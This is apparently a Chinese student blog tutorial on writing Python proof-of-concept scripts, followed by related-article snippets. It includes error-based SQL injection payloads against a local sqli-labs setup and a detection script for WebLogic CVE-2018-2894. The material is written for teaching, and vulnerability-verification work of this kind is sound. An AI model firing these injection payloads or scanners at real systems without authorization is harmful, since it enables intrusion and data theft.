寒假学习第14天--PythonPoc的基础编写

最新推荐文章于 2024-03-28 09:52:18 发布
最新推荐文章于 2024-03-28 09:52:18 发布
阅读量1k 收藏 25
点赞数 23
文章标签: 学习 网络 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73581247/article/details/135841123
版权

提示:所分享内容仅用于每一个爱好者之间的技术讨论及教育目的,所有渗透及工具的使用都需获取授权,禁止用于违法途径,否则需自行承担,本作者不承担相应的后果。

文章目录

前言

小六花今天带你学习pythonPoc的教学,当然纯属个人笔记,大佬勿喷

提示:以下是本篇文章正文内容,下面案例可供参考

一、Poc和Exp是什么?

Poc(全称: Proof Of Concept), 中文译作概念验证。在网络安全行业,理解为漏洞验证程序,类似于程序开发中的功能Demo,仅证明某功能或观点的可行性,一般不具备“破坏性”。
Exp(全称: Exploit),中文叫译作漏洞利用程序,就是一段可以发挥漏洞价值的程序。比如SQL注入漏洞,运行Exp脚本可以通过漏洞获取数据库敏感数据内容或服务器权限。
总结poc是验证漏洞出现的脚本,而exp是验证漏洞出现的同时利用脚本
看不懂的可以看这个链接
poc和exp链接

二、开始学习必需要知道的库

requests

一个实现的简单易用的HTTP库
可以看参考链接
requests链接

requests.get(url,headers,data,verify=False,proxies=proxy,timeout=10)
url —— 请求的url
headers —— 请求时构造的请求头
data —— 请求时带入的数据
verify —— 取消https告警
proxies —— 代理设置
timeout —— 请求响应超时处理

argparse

argparse 是 Python 标准库中的一个模块,用于解析命令行参数。它提供了一种简单而灵活的方式来定义命令行接口,并自动生成帮助信息。

import argparse

def main():
    parser = argparse.ArgumentParser(description='这是一个命令行参数示例')
    
    # 添加位置参数
    parser.add_argument('name', type=str, help='您的姓名')
    parser.add_argument('age', type=int, help='您的年龄')
    
    # 添加可选参数
    parser.add_argument('-g', '--gender', type=str, choices=['male', 'female'], default='male', help='您的性别')
    args = parser.parse_args()
    print(args.arg_name)

argparse.ArgumentParser可以轻松地定义和处理命令行参数
parser.add_argument可以定义不同类型的参数,例如位置参数、可选参数、布尔参数等。
**parser.parse_args()**通过调用 parse_args 方法,argparse 将解析命令行中传递的参数,并将其存储在 args 对象中。

其他库

python其他库链接

三、基础学习sqlPoc的编写

sqllabs-less-1

环境用sqllabs来进行举例
我们来到第一关,进行以下的payload

' AND (updatexml(1,concat(0x7e,(SELECT version()),0x7e),1))

发现可以爆出版本号,于是简单的poc来了

import requests ##导入库
url="http://127.0.0.1/sql/Less-1/?id=-1"##这里输入你自己搭建的网址
##导入user-agent头,可以在f12网络中找到
headers={'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36'}
##构建payload
payload="'and (updatexml(1,concat(0x7e,(select  version()),0x7e),1)) --+"
##使用requests的get方法
res=requests.get(url+payload,headers=headers,timeout=5)
if "XPATH syntax error: '~5.5.53~'" in res.text:
    print('该网址存在sql注入 ' + url)
else:
    print('该网址不存在sql注入 ' + url)

sqllabs-less-12

import requests
url="http://127.0.0.1/sql/Less-12"
headers={'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36'}
payload={
    "username":"'and (updatexml(1,concat(0x7e,(select  version()),0x7e),1)) --+",
    "password": "123456",
    "submit":"submit"
}##这里用requests的post方法
res=requests.post(url,headers=headers,data=payload,timeout=5)
if "XPATH syntax error: '~5.5.53~'" in res.text:
    print('该网址存在sql注入post ' + url)
else:
    print('该网址存在sql注入post ' + url)

四、实战案例

本次poc环境是Weblogic 任意文件上传(CVE-2018-2894)
看看别人的复现链接复现链接
首先引用两个库requests,和argparse,然后定义一个函数是用来管理命令行参数

import requests
import argparse
def argument():
    parser = argparse.ArgumentParser(description="weblogic任意文件上传漏洞验证")
    parser.add_argument('-u', '--url', type=str, metavar='', required=True, help='请输入url')
    args = parser.parse_args()
    return args

在 argparse 中,
metavar 参数用于指定帮助信息中参数的名称,这里metavar是空
type是类型
required=True 参数用于指定这个参数是必需的
help 参数用于指定帮助信息中参数的描述文本
然后我们可以定义一些修饰的东西

def banner():
    print("""
  _______      ________    ___   ___  __  ___      ___   ___   ___  _  _   
 / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \    |__ \ / _ \ / _ \| || |  
| |     \ \  / /| |__ ______ ) | | | || | (_) |_____ ) | (_) | (_) | || |_ 
| |      \ \/ / |  __|______/ /| | | || |> _ <______/ / > _ < \__, |__   _|
| |____   \  /  | |____    / /_| |_| || | (_) |    / /_| (_) |  / /   | |  
 \_____|   \/   |______|  |____|\___/ |_|\___/    |____|\___/  /_/    |_|                                                                      
 """)

最后完成我们整个的poc函数功能实现

def Poc():
    # 引入 argument() 函数
    args = argument()
    url = args.url

    # 设置 headers
    headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'}

    try:
        # 进行get请求
        res = requests.get(url, headers=headers, timeout=5, verify=False, allow_redirects=False)

        # 若get请求页面中存在<name>BasicConfigOptions.workDir</name>则存在漏洞
        if "<name>BasicConfigOptions.workDir</name>" in res.text:
            print("[+] 存在 CVE-2018-2894 WebLogic任意文件上传漏洞")
        else:
            print("[-] 不存在 CVE-2018-2894 WebLogic 任意文件上传漏洞")
    except Exception as e:
        print("[-] 请检查输入是否有误!")

if __name__ == '__main__':
    banner()
    Poc()

总结

通过结合几个类型的漏洞进行 Poc 编写,其漏洞验证手段主要是通过匹配漏洞页面的特征码去判断该网站是否存在漏洞,主要使用了 requests 库去实现模拟用户进行请求,然后匹配特征码进行漏洞判断,Poc 编写的难度不大。
到这里,就结束了,小六花祝你每天开心

参考链接

参考链接1
https://www.freebuf.com/sectool/319059.html
https://cloud.tencent.com/developer/article/1759225
https://mp.weixin.qq.com/s/aWbPUANyglL5kWiiFfSRYw

fann@qiu
关注
  • 23
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
渗透中PocExp、Payload、Rce与Shellcode的区别
墨痕诉清风的博客
10-28 3706
备注:感谢原作者,本文只为备份学习资料。 PoC,全称”Proof of Concept”,中文“概念验证”,常指一段漏洞证明的代码。 Exp,全称”Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。 Payload,中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode,简单翻译“shell代码”,是Payload的一种,由于其建立正...
学习网安需要了解的一些基础知识
fencecat的博客
02-26 3379
很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把你的所有个人情况信息、家庭状况、兴趣爱好、婚姻状况、你在网上留下的一切痕迹等个人信息全部掌握得一清二楚。虽然这个可能是最不起眼,而且还是最麻烦的方法。一种无需依托任何黑客软件,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学黑客技术。
探索Python_PoC:一个实用的Python证明概念代码库
最新发布
gitblog_00060的博客
03-28 262
探索Python_PoC:一个实用的Python证明概念代码库 项目地址:https://gitcode.com/crown-prince/Python_PoC 在编程世界中,验证一个想法或概念是否可行通常是项目开始的第一步。Python_PoC(Proof of Concept)是一个精心策划的GitHub仓库,汇集了一系列用Python编写的证明概念代码示例,它旨在为开发者提供一个快速学习和...
网络安全中的POCEXP、Payload、ShellCode
日拱一卒,功不唐捐
09-18 8682
POC:概念证明,即概念验证(英语:Proof of concept,简称POC)是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。EXP:利用(英语:Exploit,简称EXP)一般指可利用系统漏洞进行攻击的动作程序。Payload:中文 ’ 有效载荷 ',指成功exploit之后,攻击代码释放的具有攻击能力的能够实现攻击者目的的代码。
【关注观星公众号】渗透系列之POC编写之刷分大法
Websec
12-04 5130
一、前言:POC&EXP 什么是POC:即Proof of Concept,是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数据的运行,对承载用户数据量和运行时间进行实际测算,并根据用户未来业务扩展的需求加大数据量以验证系统和平台的承载能力和性能变化。在信息安全里,POC为漏洞验证程序,功能为检测漏洞是否存在。pocexp(全称Exploit)的区别就是,poc是漏洞验证程序,exp是漏洞利用程序。针对通用型应用漏洞编写poc,可
poc
qq_45337977的博客
03-04 180
poc代码如下 import argparse import socket import struct import sys ## # Read in the specified amount of data. Continuing looping until we get it all... # what could go wrong? # # @return the data we read...
大学生寒假计算机实践报告范文-大学生实践报告范文.doc
11-23
【大学生寒假计算机实践报告】 这篇大学生寒假计算机实践报告详尽记录了一名学生在清华同方售后服务部实习的经历,从中我们可以提炼出多个与计算机实践相关的知识点: 1. **基础技能提升**:实习期间,作者深入...
大学生电脑城寒假实践报告-3.docx
11-14
这篇实践报告详细记录了一位大学生在寒假期间在电脑城的实习经历,主要包括在交*慧谷域时捷、万博美讯和志诚电脑等公司的学习和工作内容。报告中涵盖了以下几个关键知识点: 1. **计算机硬件知识**:在实习期间,...
2016寒假学习计划-全文可读-学习总结.docx
11-11
【计划1】主要针对初中生的寒假学习规划,旨在平衡各科的学习,强调每日的计划性和复习的重要性。早读时段分配给了英语、语文和政史,白的主要学习时段则分别用于物理、数学、语文和英语的深入学习。晚上是综合...
2020初二寒假数学讲义-通用版.pdf
01-17
根据给定的信息,这份讲义主要讲解了初二数学中关于一次函数的相关...以上就是这份初二数学寒假讲义的主要内容,通过这些知识点的学习,学生可以更好地理解和掌握一次函数及其相关概念,为进一步学习打下坚实的基础
2022年初三数学寒假学习计划与方法-学习计划[扫描版].pdf
11-26
【初三数学寒假学习计划与方法】 初三阶段是初中学习的关键时期,尤其是数学学科,它对中考成绩有着重要影响。为了确保学生们能在寒假期间有效提升数学水平,以下是一份详细的学习计划与方法: 1. **固定学习时间*...
各类POC集合大全
04-26
各类POC集合大全 没细看 1000多个吧 需要的可以下载下来看看
渗透测试常用术语总结——(1)
dexi1113的博客
06-12 532
渗透测试的常用属于总结大全(1)
利用python编写简易POC脚本
haosha。的博客
01-30 2764
利用python语言编写简易POC脚本
如何使用Python快速编写批量POC/EXP脚本(无脑版)
Liyu_6618的博客
02-02 826
如何使用Python快速编写批量POC/EXP脚本(无脑版)
网络安全—渗透测试常用名词术语介绍篇】
旺仔Sec&blog
02-18 1685
POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。Shellcode:简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。
Python安全编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1491
本例中以靶机DVWA中的盲注为例。
python编写EXP/POC速成小记
U_U520的博客
02-22 1930
find() 方法检测字符串中是否包含子字符串 str ,如果指定 beg(开始) 和 end(结束) 范围,则检查是否包含在指定范围内,如果包含子字符串返回开始的索引值,否则返回-1。上述脚本存在误报,就是payload只有一个单引号闭合,没办法检验数字型sql,双引号型,’)型,’))等在payload中多加几个类型,可以直接导入自己的FUZZ字典。漏洞刚被批漏之后,有时候现有的工具里面是没有相应的EXP的,那我们可以根据原理写出对应的EXP代码,验证漏洞是否存在。不然会出现报错不适用。
POCEXP、Payload的区别
CC__Faker的博客
06-07 5302
POCEXP、Payload的区别 POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。 EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。 Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 总结一下自己的理解 POC:强调发现可能存在漏洞后,对漏洞是否存在的验证 EXP:对已存在的漏洞进行利用,强调利用已有资源 Payload:例如使用了一条恶意SQL语句,使
NOIP学习指南:从基础知识到CSP-J/CSP-S策略
- 第一阶段:基础编程,重点学习C++语言,包括程序结构、输入输出、变量、表达式等,以及数组和字符串、函数等概念。 - 第二阶段:程序思想阶段,注重理解和运用数学思想,通过大量练习形成条件反射,常做开放题库...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值